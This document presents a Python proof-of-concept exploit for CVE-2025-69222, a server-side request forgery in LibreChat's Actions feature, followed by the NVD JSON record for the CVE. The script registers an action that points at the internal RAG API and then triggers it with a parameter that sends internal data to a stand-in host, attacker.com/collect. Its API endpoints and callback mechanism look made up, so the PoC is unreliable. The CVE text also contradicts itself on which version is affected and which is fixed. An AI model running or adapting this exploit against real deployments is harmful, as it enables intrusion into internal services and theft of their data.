CVE-2025-69222

# CVE-2025-69222 LibreChat SSRF PoC # Author: Security Researcher # Description: Exploit for SSRF vulnerability in LibreChat Actions feature import requests import json TARGET_URL = "http://target-librechat.com" ATTACKER_CALLBACK = "http://attacker.com/collect" INTERNAL_RAG_API = "http://rag-api:5000/internal/query" def create_malicious_action(): """Create a malicious OpenAPI spec for SSRF attack""" malicious_spec = { "openapi": "3.0.0", "info": { "title": "Malicious API", "version": "1.0.0" }, "paths": { "/exploit": { "get": { "operationId": "ssrfAttack", "parameters": [ { "name": "url", "in": "query", "schema": { "type": "string" } } ], "responses": { "200": { "description": "Success" } } } } } } return malicious_spec def exploit_ssrf(): """ Step 1: Register malicious action with SSRF payload Step 2: Trigger the action to make server request to internal service Step 3: Exfiltrate internal data via callback URL """ headers = { "Content-Type": "application/json", "Authorization": "Bearer USER_TOKEN" } # Create action with internal service URL action_data = { "name": "Internal Service Scanner", "description": "Scan internal services for testing", "api_spec": create_malicious_action(), "endpoint": INTERNAL_RAG_API, "method": "GET" } # Send malicious action to LibreChat response = requests.post( f"{TARGET_URL}/api/actions/create", headers=headers, json=action_data ) print(f"[+] Action created: {response.status_code}") # Trigger SSRF by invoking the action trigger_data = { "action_id": response.json().get("id"), "parameters": { "url": f"{INTERNAL_RAG_API}?data=secrets&callback={ATTACKER_CALLBACK}" } } requests.post( f"{TARGET_URL}/api/actions/execute", headers=headers, json=trigger_data ) print(f"[+] SSRF payload sent to internal RAG API") print(f"[+] Waiting for callback at {ATTACKER_CALLBACK}") if __name__ == "__main__": exploit_ssrf()

{"cve": {"id": "CVE-2025-69222", "sourceIdentifier": "[email protected]", "published": "2026-01-07T22:15:43.523", "lastModified": "2026-01-15T21:36:03.330", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LibreChat is a ChatGPT clone with additional features. Version 0.8.1-rc2 is prone to a server-side request forgery (SSRF)\nvulnerability due to missing restrictions of the Actions feature in the default configuration. LibreChat enables users to configure agents with predefined instructions and actions that can interact with remote services via OpenAPI specifications, supporting various HTTP methods, parameters, and authentication methods including custom headers. By default, there are no restrictions on accessible services, which means agents can also access internal components like the RAG API included in the default Docker Compose setup. This issue is fixed in version 0.8.1-rc2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 5.3}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:librechat:librechat:0.8.1:-:*:*:*:*:*:*", "matchCriteriaId": "98BB9E92-2D0E-4975-A966-734F3858551B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:librechat:librechat:0.8.1:rc1:*:*:*:*:*:*", "matchCriteriaId": "8DAB7F45-699A-4383-ABEA-D4374E58EE95"}]}]}], "references": [{"url": "https://github.com/danny-avila/LibreChat/commit/3b41e392ba5c0d603c1737d8582875e04eaa6e02", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/danny-avila/LibreChat/releases/tag/v0.8.2-rc2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/danny-avila/LibreChat/security/advisories/GHSA-rgjq-4q58-m3q8", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}